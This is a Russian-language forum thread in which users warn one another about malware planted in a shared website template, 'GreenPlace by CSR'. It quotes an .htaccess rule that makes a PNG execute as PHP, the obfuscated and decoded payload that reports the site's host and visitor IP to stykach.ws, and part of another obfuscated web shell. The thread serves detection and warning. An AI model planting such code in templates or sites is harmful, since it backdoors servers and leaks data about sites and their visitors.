Информация Сюрприз в расшаренном шаблоне GreenPlace by CSR

[Demon425]

Пересматривал недавно шаблоны, скачанные с разных сайтов, в том числе и отсюда.

Наткнулся на шаблон GreenPlace by CSR. Откуда был скачан - не помню, суть не в том.

В папке images в .htaccess в самый низ дописано:

<FilesMatch "^(rss_taib)\.png$">
  ForceType application/x-httpd-php
</FilesMatch>

содержимое rss_taib.png ? помимо самой картинки в конец дописана вот такая ботва:

<? $x13="\x64i\162n\x61m\145"; $x14="fil\x65"; $x15="\155\153d\x69r"; $x16="\165\156\154i\156\153"; 
$x0b="\0600\071";$x0c="no"; if($x0c=='ok'){$x15("\x74\145\163t_o\x6b",0777);}echo "\074s\164y\x6c\x65\076\142\x6f\x64\x79\173\146\157\x6e\164\055s\151z\x65:\x30\x70\170\x3bc\x6f\x6co\162:\x23\146ff}\074/\163\164yl\x65\076"; $x0d="\150\164\164\160\072\x2f/".$x13($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$x0e=$_SERVER['HTTP_HOST']; $x0f=$_SERVER['REMOTE_ADDR']; $x10 = array('127.0.0.1'); foreach ($x10 as $x11) { if($x11==$x0f) {}else{if($_SERVER['HTTP_HOST']==$x0f){}else{$x12 = @$x14("htt\160\x3a\057\057styk\141c\150\x2ew\163/c\157k\x5fma\x69\156\056\160\x68p?\147u\075$x0e\046\165s\145\162=$x0b\046\x69\x70=$x0f\x26f=$x0d"); $x16('rss_taib.png'); }}}?>
<? echo "\x3c\x73\164\x79\x6ce\x3e\142\157\x64y\173\146o\x6e\x74\x2d\163\x69\172\145\072\x30\160\x78\x3bc\x6fl\157\x72\x3a\x23\x66\x66\146\175</\163t\x79\x6c\145>";?>

Что за ботва - пока не расшифровал, но шелл - однозначно. Так что - лишнее напоминание - будьте бдительны!

 

[-=BlackSmoke=-]

Это рип или оригинал?

 

[nafanyaa]

тут обсуждалось
Для просмотра ссылки Войди или Зарегистрируйся

 

[Demon425]

Это расшаренный оригинал, только перед тем, как его выложить кто-то добавил плюшку.

Александр не тот человек, который бы такое делал.

Мой пост - напоминание быть особо бдительными в период эпидемии взломов.

nafanyaa, я читал ту тему, но там речь шла про ExtraNews, PinkHouse, Spring Design. Оказалось в этом шаблоне тоже кто-то редиску засунул. И в bb-codes, и в png.

 

[shamantc]

На Античате уже было обсуждение данного кода

 <?php
 if("no"=='ok') {
     mkdir("test_ok",0777);
 }
 echo "<style>body{font-size:0px;color:#fff}</style>";
 $ips = array('127.0.0.1');
 foreach ($ips as $ip) {
     if($ip==$_SERVER['REMOTE_ADDR']) {
  
     } else {
         if($_SERVER['HTTP_HOST']==$_SERVER['REMOTE_ADDR']){
  
         } else {
             $x12 = @file("http://stykach.ws/cok_main.php?gu={$_SERVER['HTTP_HOST']}&user=009&ip={$_SERVER['REMOTE_ADDR']}&f="."http://".dirname($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']));
             unlink('rss_taib.png');
         }
     }
 }?>
 <? echo "<style>body{font-size:0px;color:#fff}</style>";?>

 

[BKK]

Warning: file_put_contents(.//) [function.file-put-contents]: failed to open stream: Is a directory in /var/www/vip-base/data/www/stykach.ws/cok_main.php on line 26

палево жесткое

 

[fri]

Вообще любой шаб, даже не фришный, есть смысл пересмотреть, мало ли кто чего туда положил.
Встречал другой вариант, в картинках, где прилагается color.html в этом самом файле была плюха.

<?php $x2a="\x63\150m\157\144"; $x2b="\143\157\x70y"; $x2c="c\157\165\x6e\164"; $x2d="\x66\x63\154\157se"; $x2e="\x66\x69l\x65"; $x2f="\146\x73\157c\153\157\160\145n"; $x30="\x66op\145\156"; $x31="\146pu\x74\x73"; $x32="\151m\160\x6co\x64e"; $x33="\155d5"; $x34="\x73e\x73\163\151\x6fn\x5fst\141\162\164"; $x35="\x73\164\162\137\x72\x65\160\x6ca\143e"; $x36="u\x6e\x6c\151\x6e\x6b"; 
if($_GET['upload']){$x34();if(isset($_GET['a']) && $_GET['a']=='logout') unset($_SESSION['auth']);if(isset($_POST['pass'])){ $x0b = array( 'root' => $x33($x33('uvCJlBF9eIcq9bEhUpg83baFcW9JKmqa')) ); if($x0b['root'] == $x33($x33($_POST['pass']))){$_SESSION['auth'] = true; }}if(!isset($_SESSION['auth']) || $_SESSION['auth'] != true){$x0f=$_GET['hp']; echo <<<EOF

ну и так далее, весь код не привожу, его там много и никому он не нужен )) Пересматривайте всё, амигосы

 

[-=BlackSmoke=-]

где прилагается color.html в этом самом файле была плюха

там же модифицированный .htaccess, который указывает апачу, что надо выполнять html как php, без него данный код не имеет смысла.

 

[killoff]

Неужели прикрепленная тема "[Info] Уязвимости в бесплатных шаблонах" не об этом говорит? К чему каждый 5-10-й пользователь создает отдельную тему на один и тот же вопрос? Да было в шаблоне, да прописали в htaccess, да вместо самой картинки в файле картинки прописан php код и т.д. и т.п. Одно и тоже каждый раз!!!
:tcl: